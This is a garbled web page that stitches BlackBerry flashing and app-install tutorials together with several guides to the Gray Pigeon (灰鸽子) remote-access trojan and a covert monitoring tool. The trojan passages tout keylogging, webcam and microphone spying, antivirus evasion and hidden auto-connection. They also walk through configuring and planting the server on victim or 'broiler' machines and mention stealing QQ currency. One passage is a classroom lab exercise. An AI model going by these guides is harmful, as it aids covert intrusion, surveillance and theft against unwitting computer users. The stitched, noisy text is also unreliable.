黑莓刷机教程 此篇以9650为例进行刷机，其中包含刷机、SB 、调试。【本帖内容主要借鉴论坛，并非原创，做的不好敬请原谅，希望可以帮助煤油们】Are you readey? 首先我要对煤油说的是，玩机嘛，就是玩，要有个度，别玩得心力憔悴，反而被手机玩了，对不对呢，呵呵。只要我们刷到自己顺手，可以使用就OK。 我们刷机一共需要四部 大纲 第一步，刷机，其中我们需要自己想要的ROM（9650本人推荐5.0.0.975和混刷6.0.0.443还有好用的桌面管理器. 第二部，刷入SB ，其中会用到桌面管理器、BBSAK 、BerryBox 第三部，手机调试，其中主要是国家地区设置，浏览器设置等。第四部，刷入软件，这个其实挺重要，毕竟黑莓不成熟，不是ROM的问题就是软件的问题了。 现在我们进行每一步的详细讲解 一．刷机 1.首先下载rom 5.0.0.975

6.0.0.443和混刷包 2.安装（5.0的我就不多说了，6.0的给大家混刷过程。5.0直接安装滤过此部）6.0安装完443的ROM后，把解压出的461-Java文件夹覆盖至C:\program files\common files\research in motion\shared\loader files\9650AllLang_v6.0.0.443_P4.4.0.348\Java 下 4.用DM或者BBSAK备份数据（程序不推荐备份） 5.删掉C:\program files\common files\research in motion Loader\AppLoader的Vendor这个XML 文档开始正常刷机 需要补充一下的是，如果不能正常刷机，请对手机进行WIPE，此过程非常简单,下载然后点一键WIPE手机就会自动重启，并开机显示503，表示手机内没有系统的意思。如还是不行请联系QQ 二.导入SB 此时5.0和6.0又不一样了~~~纠结~~6.0麻烦一些。 先进行5.0讲解

如何使用灰鸽子软件

灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据！普通同类软件都用到了两个或两个以 上的端口来完成！ 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑！软件智能读 取系统设定的代理服务器信息，无需用户设置！ 3.无需知道服务端IP，自动上线功能让服务端自动上线报道！灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式，在我们的专 用上线系统出现故障时，您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时，你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组，自定义上线图像，上线备注等，这样都 可以让你轻而易举的找到目标主机，同时设置连接密码保证了服务主机的安全性 ！同时具用牵手版的搜索符合条件主机的功能： a.从主机窗口筛选：可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏！ b.从主机进程筛选：可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了！ 5.文件管理：管理远程电脑的文件系统,支持复制、粘贴、删除，断点下载、 上传文件或文件夹，文件内容均以加密方式传输，确保通讯的安全性. 6.远程控制命令：包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制！ 7.注册表编辑器：可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播，让你控制主机众多主机更多的方便！详细的在线主机线表 显示了：主机IP地址，地址位置，电脑名称，系统版本,备注等信息, 9.除了具有语音监听、语音发送，还有远程视频监控功能，只有远程计算机 有摄像头，且正常打开没有被占用，那么你可以看到,远程摄像头捕获的图片！还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能！无需第 三方软件支持！支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具： a. EXE工具: 可以修改任何EXE文件图标，支持真彩色！ b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上，使 你在局域网内部也能使用自动上线功能！ c. FTP服务器: 可以开本机FTP服务！ d. Web服务器: 可以建立一个简单的Web服务器！ 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面，让你一目了然，漂亮皮肤让使用时也倍感亲切！ 功能简单介绍： 【1】对远程计算机文件管理：模枋Windows 资源管理器，可以对文件进行复制、粘贴、删除，重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用

黑莓刷机教程及步骤

资源下载 桌面管理器 最新的ROM 应有尽有 黑莓手机软件大量高价值应用软件，任 君选择！ 黑莓新手教程玩黑莓没一点基础是不行 滴，进来学点吧！ 5Abb 办公室意见建议、投诉举报、合 作申请…… 123下一页 返回列表发帖 我爱B B ? 黑莓83X X 讨论区 ? 黑莓手机最新刷机教程（8300示范）5.0桌面管理器 [分享]移动之后，双击打开桌面管理器 我爱B B 礼品兑换推荐商家帮助导航 97 147 133 当前离线 冷雨夜 级别: 黑莓试工发帖: 39 (0)威望: 70 点在线: 9（时）

打开之后，点击 应用程序加载器如下图 然后点击 更新软件的 开始，如下图 是什么R O M啊，安装了些什么软件啊等等。不用管它，让它加载就可以了，

加载完了之后，会出现如下图显示的界面，这时，点击 选项 了，哈哈。 勾选完了，点击 下一步，如下图

的哦，点一下 完成 开始了，桌面管理器在备份你的数据了，呵呵 警告：在所有任务完成前，不要断开设备的连接

出现如下界面的时候，加载操作已成功，那就说明你刷机已经成功咯。 刷机完成后，会有提示的，但是刷机后，第一次开机会有点久，比普通正常开机的时候要久得多，大家不要以为出错了哦，耐心的等待就O K 了。呵呵 友情提示一下各位胖B B 的莓友们，刷机其实就是这么简单，并不困难，很多朋友认为刷机是一个很难的，很大的工程，只要大家多多研究，多多学习，你会发现黑莓会给你带来很多乐趣的。

刘艺0414 鑫烨华科技 收藏 支持，，，，，学习中 支持，学习了，谢谢啊 谢谢了，学习了 5 5 5 当前离线 x i a o y i 53070 级别: 黑莓学徒发帖: 4 (0)威望: 5 点 在线: 0（时）13 2 13 当前离线 b f a n 级别: 黑莓学徒发帖: 12 (0)威望: 13 点在线: 2（时） 当前离线

灰鸽子使用教程图解

灰鸽子使用教程图解 （考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看） 第一部份：网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。 Netman监控版详细安装方法： 1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。 2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program

式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。 3.完成以上操作后，再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。 5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。 出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码，可点击“选项”-“修改密码”。

灰鸽子上线详细教程

Gray pigeons -- 灰鸽子是什么呢？ 灰鸽子简单的说它是远程监控软件,（黑客类）,当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分：客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端（简称：免杀），免杀的话那就是杀毒软件查不到那是一个木马程序！ 鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。这就好比火药，用在不同的场合，给人类带来不同的影响！（其他的我也说不清楚）如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。（如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用） 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻（前提是需要控制到宽带上网用户） 个人对鸽子的认识我对它的了解也不是全面的（现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧！） ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧！ 灰鸽子下载：https://www.sodocs.net/doc/c94473211.html,/file/t06ef189fa（不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜）

黑莓怎么安装软件

黑莓怎么安装软件 虽然黑莓手机在中国的用户并不是特别多，但是由于手机本身强大的功能及人性化的设计赢得了许多忠实的用户，包括本人在内也是黑莓的忠实用户，本文就以黑莓8900为例，介绍下黑莓手机安装软件的方法，希望对大家有所帮助。 电脑一台 黑莓原装数据线一根 黑莓手机一部前言 给黑莓手机安装软件有两种方法，一种是直接在手机端OTA安装，另外一种是通过电脑端的管理软件进行安装。通过手机OTA安装只需要手机能够正常连接到网络即可实现，通过电脑端管理软件安装则需要先安装好手机驱动，然后再通过电脑进行安装。本文就分别介绍这两种安装方法。通过电脑端管理软件安装 1 下载工具：先在电脑端下载黑莓PC端管理软件，本文以BerryBox软件为例，下载地址：baidu./share/link?shareid=252586&uk=1426351191,B

erryBox为绿色软件，下载解压即可使用2

安装驱动：将手机用数据线连接到电脑上，再运行BerryBox软件，如果软件无法正确识别到手机，则点击“加载驱动程序”，根据界面提示完成驱动程序加载，在驱动加载过程中弹出对话框一律“确定”通过。3 驱动安装完成后再回到BerryBox，如果软件还没有正确连接到手机，则可点击“刷新设备”按钮，等待软件正确检测出设备PIN码后，点击“连接设备”按钮，手机顺利连接上BerryBox软件。4 加载程序：手机连接成功后，再点击“选择COD目录”按钮，找到电脑上已经下载好的黑莓手机软件，一次性可以同时添加多个程序5 安装程序：如果我们一次性加载了多个黑莓软件，则可以勾选右边的“全选/不选”，将当前软件全部选中，再点击“安装选定”即可进入软件安装，我们只需要等待软件安装完成即可通过手机端OTA安装 1 其实黑莓可以直接通过手机上网实现OTA软件安装，但前提是手机能够正常连接到网络。先打开系统自带的浏览器，并在地址栏输入https://www.sodocs.net/doc/c94473211.html,，进入莓园无线的主页。莓园无线是一个专业的提供黑莓软件下载的网站，里面包含非常多

黑莓——使用WIPE.exe软件刷机教程综合版

黑莓刷机教程（各机型通用） 黑莓刷机分为两种刷机方式： 第一种：桌面管理器刷机（不采用）桌面管理器刷机连接的服务器ROM文件都是欧美的不 包含中文，刷机后手机没有中文选项！洋码子好的喜欢鸟语的可以使用桌面自动更新ROM ！第二种：WIPE刷机（最佳）！ 下面我图文详细的说明怎么：WIPE刷机！ 一：准备好硬件与软件，硬件不用说了吧、、、（有电的）手机、（不抽风的）数据线，（带电的）电脑！软件就是：wipe （格式化手机软件）与 ROM （东亚版、亚太版、香港版这三种那种都可以）！ 计算机确保都安装黑莓桌面管理器个人推荐桌面管理器5.0版本！ 二：解压缩安装 ROM :（我用自己的8220手机刷机为例，其他黑莓手机程序跟我下面的图文一样）ROM必须安装在C盘！ BtackBerry Device Softv/dre 版本460 - In^taflShield Wizard 选择您当前所在的国家或地医： 中华人民共和国 a!|3T^ad ---------------------------------------------------------------------- [ ＜上一步＜因I下一步_职消

这里切记：不要勾选那个：是，我想启动应用程序加载程序！！ 直接点击完成！ 三：进入 C 盘T program files 宀 com mon files research in moti on appload B除 ven dor 这 个文件！删除这个文件后关闭文件夹框子，一定要关闭！ 四：用数据线连接手机和电脑，打开WIPE 软件点击：开女台WIPE 黒毒WIFE教学 如果你的師已经莫名的出皓，而且无可救药’甚至刷机都无运解决问题'那么就有必要班FE机黑了°什么是WIPE?""就是除除＞就是注你的師什金都没有了＞燃后再刷机即可. 一■引用［茸战胜佛1的话 操作再简卑不过了：将你的黑莓与电脑连接-＞第二步点击开始WTFE ［眨眼间你的盼就只会说5M啦］第三步刷ROM 专业术马查杀莪件术马董家20聽点击免费下载 点击后手机自动从新启动，然后手机显示：507就可以刷机了 ?黒莓一St?IPE程序VI,程序：B E 这就是507的图片!

【黑莓8830刷机教程】+完整详细整理+超级简单易懂

【教程】黑莓8830刷机教程 一、前言： 黑莓手机刷系统非常的简单，网上乱七八糟的一大片，说要安什么桌面管理器安这个安那个的，其实仅仅对于刷机来说根本不需要那么复杂，需要的软件只有三个，如下： 1.wipe一键工具（用于格式化或者叫擦除手机原有的系统） 2.各版本的Rom，可自行下载，包括汉化版；（这里的rom是集成了刷机软件的，一般都有80多M大，可以自己在网上下载，它的名字叫8830AMEA_PBr4.5.0） 3.Service Book，也就是SB，可到上面论坛进行下载；（sb的作用：导入了sb之后才能用自带浏览器上网） 二、开始刷机 有了这三样东西就可以刷机了，其他论坛还说安装什么的，一大把，其他有这几样足够了。 1、安装Rom，如下图所示 1）记住，安装rom是第一步，我们这次刷机无需安装桌面管理器，也不要安装它。rom文件如下图中的8830AMEA_PBr4.5.0就是rom安装包，在网上下载好后直接双击8830AMEA_PBr4.5.0，先把它安装到电脑上。

2）选择安装语言，该语言并且安装后手机语言，是要汉化的 3）、再选语言，对应

4）把下边的钩去掉，然后点完成 2、把黑莓8830用数据线连上电脑，再打开Wipe，擦除黑莓里面的系统。 3、手机会重启，等一会，手机屏幕上会出现以下显示 4、开始安装系统：找到目录C:\Program Files\Common Files\Research In Motion\AppLoader，先把Vendor.xml这个文件重新改一个名字（如果不改的话 黑莓就连不上电脑，切记），如下图

等刷完机再改回原名，改完名之后再找到Loader.exe，如下图所示

灰鸽子远程控制软件

灰鸽子远程控制软件 【实验内容】 灰鸽子木马是网络上常见的并且功能强大的远程后门软件。采用dll注入技术，开启服务程序，从而实现远程控制的目的。本实验以灰鸽子木马为例进行木马的制作、种植和攻击。实验原理】 木马，全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出先在希腊神话传说中。一般木马程序都是隐蔽的进程,不易被用户发现。计算机木马程序一般具有以下几个特征： 主程序有两个，一个是服务端，另一个是控制端。服务端需要在主机执行。 当控制端连接服务端主机后，控制端会向服务端主机发出命令。而服务端主机在接受命令后，会执行相应的任务。 灰鸽子是国内一款著名后门软件，是国内后门软件的集大成者。具有丰富而强大的功能、灵活多变的操作、良好的隐藏性。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。 【实验环境】 本地主机(WindowsXP)、Windows实验台，灰鸽子客户端软件。 实验的网络拓扑如图3.5.8-8所示，实验目标需首先确定所在主机实验台IP地址，并根据实验步骤填写正确的IP地址进行实验。 Windows实验台 本地主机 图3.5.8-8 【实验步骤】 一、木马制作 启动实验台，并设置实验台的IP地址，以实验台为目标主机进行攻防试验。 (1)在学生客户端，下载木马制作程序，打开客户端程序（可能需退出安全程序），灰 鸽子客户端的操作界面如下图所示。

(2)首先需要配置服务程序。点击“配置服务程序”，出现如下图所示的界面。 图 3.5.8-10 (3)在“自动上线设置”里，填写上“IP通知http访问地址、DNS解析域名或固定IP”, 此时填写学生客户端IP地址，然后设置连接密码，如下图所示。 图 3.5.8-11 (4)为了保证服务端程序运行的隐蔽性，我们可以把“安装选项”里的“安装后自动删 除安装文件”选中；如下图所示。

黑莓手机安装软件教程

部分新手莓友初入手BB，想安装一些软件，但又不知如何下手。 最简单的方法就是使用手机自带浏览器访问https://www.sodocs.net/doc/c94473211.html, 这类OTA网站下载安装软件。 但论坛上莓友们分享的众多软件应该如何安装呢？下面主要为新手莓友简单介绍使用“桌面管理器”安装软件的方法。 新手教程，对黑莓已经比较了解的莓友可以飘过。 小常识： 黑莓的软件一般分为两种格式： 1）alx + cod 格式文件，这种需要将手机与电脑连接，通过“桌面管理器”或“黑莓右键总管”安装。 2）jad + cod 格式文件，这种可以直接拷贝到手机里运行jad文件安装。 其实如https://www.sodocs.net/doc/c94473211.html, 这种OTA网站下载下来的只是jad文件，jad文件下载下来后运行jad时，手机会根据jad里的引导信息继续下载cod文件，两个文件都下载完成后就安装完毕。 如果已经同时有了jad和cod两种文件，运行jad时，还是会提示下载，这个时候不用担心，那只是在加载已经存在的cod文件，不会真的去下载产生流量。 一般论坛上莓友分享的都是软件压缩包，所以你下载的软件到底是alx + cod 还是jad + cod，解压后就可以知道。按照相关的方法操作就可以了，其实黑莓并不是那么难以接近 我这里以7。1版为例。要桌面管理器的可以到360安全卫士的软件管理里搜索“黑莓桌面管理器”就可以下载的到了。我不做废话的介绍了，大家看图应该就能够明白。 第一种方法应用程序加载器（按照这个路径找到这个文件，打开loader.exe文件C:\Program Files\Common Files\Research In Motion\AppLoader\loader.exe） 就显示： 点下一步，后如图：

黑莓9000刷机教程 详细图文并茂

黑莓9000刷机教程详细图文并茂 前言：黑莓手机论坛黑莓论坛0?,G3s:d#` s_ # {$ a4 f9 @ 玩了bold9000月余，各种软件装了个遍，对于一些黑莓的操作、软件特点有了了解，便决定进行传说中有风险的ROM刷机。我现在的ROM 版本是4.6.0.247，经过查找资料，现在最新的ROM是4.6.0.282，还好，有刷机的机会，想到就做，刷机开始。% Z6 B0 j5 [0 `5 u) T 手机论坛黑莓论坛/f+{#^!z6b3p1B K; ?0 x3 }; k ?3 [) h6 Z8 Z# w) 一、刷机准备 1 {2 D7 b$ P: _) \9 j9 t 1、黑莓桌面管理器，最新5.0版下载：【本论坛不让发带外链的 帖子，，所以这里辛苦大家自己搜索下吧】 BlackBer ry-最好的黑莓手机论坛刷机下载/A%j;u!X8k#v*}-_*M)~8 ]9 @4 O- X% h# t1 L/ N' O 2、最新黑莓9000ROM4.6.0.282，下载地址：【本论坛不让发 带外链的帖子，所以这里辛苦大家自己搜索下吧】7];@!p:H z$B8k5r)x 3、将手机与电脑通过USB相连接。3f$j$n!k3D0K" ]* K" L# U; B$ B5 \ 4 I; ]( K% o- {3 d# ?$ h# I1 o 二、刷机前备份系统（刷机过程中系统会自动备份，此处的备份可 以自由定制备份项目，如果你不想麻烦，略过此步亦可） . ], P5 M : L) n. d 1、打开桌面管理器，选择“备份和恢复”7L"N;V:],a.U-g)F:x;l' }0 ?# |$ w: E 8 ^1 s: b6 ~3 ^' K7 M6 g 2 Y& z, F1 E* U. D0 H! Z \-g$V0J 2、进入后，点击“高级”按钮，进入 BlackBer ry-最好的黑莓手机论坛刷机下载%@"E6H0V/D*|1x

灰鸽子木马利用与防护

任务名称：灰鸽子木马利用与防护 任务目的与要求： 了解木马病毒对终端主机的安全威胁，以及木马病毒如何对主机进行攻击。本次任务要求学生学习灰鸽子木马远程控制软件的使用，通过实验可以了解木马和计算机病毒的区别，熟悉使用木马进行网络攻击的原理和方法。 实验任务涉及到的相关知识： 任务环境拓扑： 具体步骤： 1.登录windows2003，打开灰鸽子软件。 winxp windows2003

2.灰鸽子木马共有两个应用程序，其中一个是服务器程序，该程序由客户端配置产生，属于木马受控端程序，种木马时，需将该程序放入到受控端的计算机中，然后双击该程序即可；H_client.exe是木马的客户端程序，属于木马的主控端程序。首先点击H_client.exe打开客户端，选择“文件-配置服务器”配置服务器端。点击“生成服务器”即生成了一个服务器端，点击“确定” 3.登录到XP系统。点击“开始”-“运行”，输入“\\192.168.0.46（win2003的IP地址，已在win2003系统下通过ipconfig命令查看为准），可以通过共享查看win2003共享的文件,如图所示，将setup.exe拷贝到XP系统的桌面，然后双击运行。

4.返回win2003，点击“文件”-“增加主机”，输入XP的IP地址192.168.0.43（以在XP下通过ipconfig命令查看到得IP为准），点击确定。 5.双击文件目录浏览下的“我的电脑”，可以查看到主机为192.168.0.43的标识。然后双击192.168.0.43，可以查看到XP系统的目录及文件。此时点击C：\Documents and Settings\Administrator\桌面，可以查看到XP左面上放置的文件setup.exe服务器端。

黑莓安装软件的三种方法

第一种方法：正统式，就是使用黑莓官方的桌面管理器对应用程序进行安装（即常说的"DM"：Handheld Tools Desktop Manager） 本文选择的是4.21版的DM，更高版本的DM虽然UI界面不一样，功能却都差不多，DM 程序的安装部分无需多言，一路NEXT即可。 1.安装完毕后，打开DM程序，我们可以看到如图一所示的几个按钮，在这里，我们点选其中的“应用程序加载器按钮”来进行操作。 2.出现程序加载器的欢迎界面，点击“下一步”： 3.出现应用程序加载器向导界面，在这里我们可以一目了然的看到BB中“正常”加载进去的程序，（关于JAVALOADER加载后的程序无法在DM中看到的情况我们后面再说）在这里，我们点击右上角的“添加”按钮： 4.点击添加按钮后，我们找到我们需要安装的软件 （在这里，我需要的是找到ALX文件，ALX类似一个指向索引，本身并无用处，但是要在DM里面安装却必须用到它，这里要注意:大部分情况下ALX文件和COD文件要在同一文件夹里，可以复选多个ALX进行快捷添加） 点选该需要添加的ALX文件后，选择下方的按钮“打开”即可，如图所示： 5.添加完毕后，就会回到开始的向导界面，在程序列表中我们可以看到刚才添加的程序成为了待安装状态，我们选择点击“下一步”： 6.点击后出现确认界面。在这里可以清楚的看见本次安装和删除了那些应用程序，点击完成即可完成整个安装过程： -----------------------------------------------------------猥琐而华丽的分割线------------------------------------------------------------ 第二种，非主流安装方式：使用JAVALOADER及其衍生物进行安装JAVALOADER的衍生物有好几个，在这里我选择我自己常用的Winloader来进行演示。 下载好Winloader后直接解压到任意路径（最好是英文路径下）然后直接选择双击其中的“WinLoader.exe”。即可出现如下界面： 1.我们在第一个选项卡，即默认界面的最下方可以看到“安装COD”，点之：

黑莓强刷标准规范教程+下电池强刷

强刷一般用在机器出现523等错误提示的时候，机器无法正常开机的时候，4.6的os升级到5.0的时候 QUOTE: 准备工作 第一步 https://www.sodocs.net/doc/c94473211.html, 下载桌面管理器然后安装建议默认在c盘 或者这里下载 https://www.sodocs.net/doc/c94473211.html,/BlackBerry/501_b073_multilanguage.ex e 第二步 https://www.sodocs.net/doc/c94473211.html,输入你的手机型号点击搜索下载rom 然后安装。 （一定是你手机型号。8800的手机不要下载8820的rom，8310就不要下载8320的rom。） 第三步 然后删除C:\Program Files\Common Files\Research In Motion\AppLoader目录下的Vendor.xml 文件 QUOTE: 强刷 不需要急急忙忙的刷机 我们先做个检讨，核对清楚。 电脑上，访问C:\Program Files\Common Files\Research In Motion\Shared\Loader Files 必须看到如下图显示。当然了你那里可能只有一个文件夹。 但是共同特点就是肯定是数字型号然后破折号然后是版本号。 其中的数字型号一定和你手机的型号一样。否则就不需要考虑下一步刷机。如下图我这显然无法刷8820 8700等型号。因为没有安装对应型号的rom。

然后电脑上访问C:\Program Files\Common Files\Research In Motion\AppLoader 确定这里面看得到Loader.exe 并且看不到vendor.xml文件 经过以上的核对，确定无误以后。 双击Loader.exe，如下图

黑莓WIPE强行刷机教程

WIPE机器然后强行刷机 使用本手法，如果你不是很熟练这个过程，敬请参考以下教程先 【图文】新手不建议－刷ROM装汉化【全面修订】 https://www.sodocs.net/doc/c94473211.html,/viewthread.php?tid=3607 不得已，这个教程非写不可了；几乎每天都有新手要在这个地方踌躇不前。一旦出现了很莫名其妙的问题，最好的解决办法莫 过于Wipe，然后进行刷机啦，但是一旦WIPE以后就只出现507，桌面管理器就无法认识到机器，【7230 显示的是505】就提示已断开 解决办法：不要理会强行刷机，放心刷不坏的。教程开始啦 [本帖最后由斗战胜佛于2009-8-28 23:03 编辑] 附件 2006-7-28 16:52 1.JPG(17.94 KB) 1.正常连接BB和电脑提示如图 2006-7-28 16:53

2.选项－－连接设置 2006-7-28 16:54 3.JPG(16.75 KB) 3.点击检测提示如此确认 2006-7-28 16:55 4.JPG(16.88 KB) 4.提示发现设备到这儿就应该放心还是可以刷机的 2006-7-28 16:56

5.开始刷机吧点击【应用程序加载程序】 2006-7-28 16:57 6.JPG(23.62 KB) 6.肯定的点【下一步】出现如图提示可以不管 2006-7-28 17:01

7.啊呀怎么会这样子呢很多人都会遇到这个现象呢【原因】1.没有下载ROM并安装 2.没有删除或者 ... 2006-7-28 17:03 8.JPG(44.75 KB) 8.这才是正确的哦呵呵 2006-7-28 17:09

灰鸽子内网上线教程

序： 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式，有些是直接处于公网上的，但是也有很多都是用路由划分一个或多个vlan，通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端，需要反弹回来连接灰鸽子客户端的8000端口。但是，拨号上网的IP不是固定不变而是动态IP，每次获得的IP都是不一样的；或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。（8000端口是灰鸽子的默认端口，这个端口是可以更改的） 要让鸽子的服务端每次都能找到客户端，反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网，让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种：可以绑定一个DDNS 域名（动态域名），可以在路由器上做端口映射，也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多，设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢，只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网，通过交换机和路由器公用一个公网IP上网，又不能获得路由器的控制权，所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀，这个vidc根本就不在杀毒软件的打击范围，这个不是我一个人说的，是很多黑客老前辈说的，并且我也亲身做过实验，用360杀毒、瑞星和国外杀软avast都进行过扫描，全部都是正常。 正文： 第一步： 把vidc的服务端vidcs传到公网的机子上，肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图：

黑莓9530刷机教程

大家好，我来说一下黑莓9530亲自刷机的步骤吧，这个步骤是我根据网上一些刷机教程改写的，增加了比较多的描述语言，因为刷机忘了截屏，请大家多多包涵，不过下面描述 刷机软件准备：需要下载的东西!桌面管理器下载 1、wipe软件，即电脑端安装的擦除爱机系统（BB系统格式化）的软件； 2、ROM，即在机主想要刷机版本的电脑端安装的手机系统文件需要自己上论坛下载例如（9530hwEastAsia_PBr5.0.0_rel1688_PL4.2.0....等） 3、桌面管理器，就是平常给黑莓手机安装软件用的那个桌面管理器，即电脑端安装的手机管理工具（重要现在常用的有4.2版，4.7版和5.0版）这里主要用的是4.2版比较简单， 好了，东西准备齐了，开刷： 1、安装桌面管理器，我开始安装的是v4.2版，默认安装，到中间位置有个选数据库的地方我选的是下边那个，没有试过上边的那个，不知道能不能成功 2、连接手机，使用备份工具将手机备份导出，导出后为“.ipd”后缀，管理器里的备份工具在刷机时必不可少，可以在刷机前备份你的BB上重要的资料，回传会省下不少力气。 3、安装ROM，例如（9530hwEastAsia_PBr5.0.0_rel1688_PL4.2.0....等），这个系统经过亲测，感觉良好，手指滑动长菜单时比原来的版本流畅许多。不过不支持手写，这里主要讲刷机要领，呵呵，也可能是我在下边的操作有误导致不能手写，具体下面讲到，一路默认安装。 4、找到并删除或者改名字“C:\Program Files\Common Files\Research In Motion\AppLoader”文件夹当中的“Vendor.xml”文件，据说高版本的桌面管理器刷机时不用删掉此文件，那么最好改名即可。 5、wipe你的BB，需要说明的是WIPE和JAVALOADER两个文件一定要放到一个文件夹内（本贴提供的WIPE压缩包内已含两者）。连接BB以后双击wipe.bat文件即可；后出现黑屏稍后白屏。 6、wipe成功后你的BB白屏，显示什么读取软件错误“error software 507”，表示系统格式化成功； 7、由于手机连接电脑后会不时有断开及连接声音提示，搞不清到底是断开了还是连接上了，那就在刷机前再次确认你的BB状态，打开桌面管理器查看选项——连接设置——USBPIN这只要USB显示你的PIN码就可以了，说明连接正常。注：如果根本不显示你的PIN码，那 就麻烦你重启电脑，然后重新安装上述两个软件1和3，其中第1步安装完毕可能